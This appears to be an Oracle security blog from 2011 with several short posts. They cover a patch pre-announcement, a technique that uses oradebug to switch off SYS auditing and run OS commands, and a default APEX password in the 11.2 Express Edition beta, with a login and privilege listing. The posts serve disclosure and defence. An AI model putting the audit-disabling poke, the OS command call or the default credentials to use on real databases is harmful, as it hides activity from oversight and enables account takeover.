Alexander Kornbrust Oracle Security Blog

DOAG 2011 Presentation “Best of Oracle Security 2011″

Alexander Kornbrust — Fri, 18 Nov 2011 16:11:49 +0000

I just uploaded my DOAG 2011 presentation ”Best of Oracle Security 2011“.

Oracle Critical Patch Update Pre-Release Announcement - October 2011

Alexander Kornbrust — Sat, 15 Oct 2011 08:20:10 +0000

Oracle released the Pre-Release Announcement for the Oracle CPU October 2011. The upcoming CPU will fix 4 issues in the Oracle database:

Application Express
Core RDBMS
Database Vault
Oracle Text

The highest CVSS value is 6.5 (normally a SQL Injection vulnerability). None of the issues is remote exploitable.

Disable Auditing and running OS commands using oradebug

Alexander Kornbrust — Sat, 17 Sep 2011 17:29:29 +0000

Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth. He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage soonerorlater.hu.

oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:

Sample - disable Oracle SYS Auditing:

sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0×60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .

Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database

SQL> oradebug call system “ls -la >/tmp/hacktivity.txt”

Later I will talk about Laszlo’s trick how to disable the Oracle authentication using oradebug.

Blackhat Training “HACKING AND SECURING ORACLE (2 days) “

Alexander Kornbrust — Wed, 13 Apr 2011 09:05:18 +0000

Oracle Database 11.2 Express Edition Beta comes with weak default password

Alexander Kornbrust — Sat, 02 Apr 2011 11:38:23 +0000

Yesterday Oracle released the first beta of Oracle Database 11.2. Express Edition. I downloaded the beta and after installation I run our database scanner Repscan against it.

It was surprising that Oracle delivers 11.2 Express Edition with a default password for the open APEX_040000.

C:\>sqlplus apex_040000/oracle@192.168.2.38/XE

SQL*Plus: Release 11.1.0.7.0 - Production on Sat Apr 2 13:33:24 2011

Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - Beta

SQL> desc dba_users
Name                                      Null?    Type
—————————————– ——– —————————-
USERNAME                                  NOT NULL VARCHAR2(30)
USER_ID                                   NOT NULL NUMBER
PASSWORD                                           VARCHAR2(30)
ACCOUNT_STATUS                            NOT NULL VARCHAR2(32)
LOCK_DATE                                          DATE
EXPIRY_DATE                                        DATE
DEFAULT_TABLESPACE                        NOT NULL VARCHAR2(30)
TEMPORARY_TABLESPACE                      NOT NULL VARCHAR2(30)
CREATED                                   NOT NULL DATE
PROFILE                                   NOT NULL VARCHAR2(30)
INITIAL_RSRC_CONSUMER_GROUP                        VARCHAR2(30)
EXTERNAL_NAME                                      VARCHAR2(4000)
PASSWORD_VERSIONS                                  VARCHAR2(8)
EDITIONS_ENABLED                                   VARCHAR2(1)
AUTHENTICATION_TYPE                                VARCHAR2(8)

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
—————————— —————————— — — —
APEX_040000                    CONNECT                        NO YES NO
APEX_040000                    RESOURCE                       YES YES NO

SQL> select * from user_sys_privs;

USERNAME                       PRIVILEGE                                ADM
—————————— —————————————- —
APEX_040000                    CREATE TRIGGER                           YES
APEX_040000                    CREATE SYNONYM                           YES
APEX_040000                    UNLIMITED TABLESPACE                     YES
APEX_040000                    ALTER SESSION                            NO
APEX_040000                    CREATE JOB                               YES
APEX_040000                    CREATE DIMENSION                         YES
APEX_040000                    CREATE SEQUENCE                          YES
APEX_040000                    CREATE TABLE                             YES
APEX_040000                    ALTER USER                               NO
APEX_040000                    CREATE USER                              NO
APEX_040000                    CREATE SESSION                           YES
APEX_040000                    CREATE OPERATOR                          YES
APEX_040000                    ALTER DATABASE                           NO
APEX_040000                    DROP USER                                NO
APEX_040000                    CREATE INDEXTYPE                         YES
APEX_040000                    CREATE MATERIALIZED VIEW                 YES
APEX_040000                    CREATE VIEW                              YES
APEX_040000                    CREATE CLUSTER                           YES
APEX_040000                    CREATE ANY CONTEXT                       YES
APEX_040000                    CREATE PROCEDURE                         YES
APEX_040000                    DROP PUBLIC SYNONYM                      NO
APEX_040000                    DROP TABLESPACE                          NO
APEX_040000                    CREATE TABLESPACE                        NO
APEX_040000                    CREATE TYPE                              YES
APEX_040000                    CREATE ROLE                              NO
APEX_040000                    CREATE PUBLIC SYNONYM                    NO

26 rows selected.

SQL>

This APEX user has for example ALTER USER privileges and can change the password of any user in the database.

Please change the password of APEX_040000 after the installation of the new 11.2 Express Edition beta.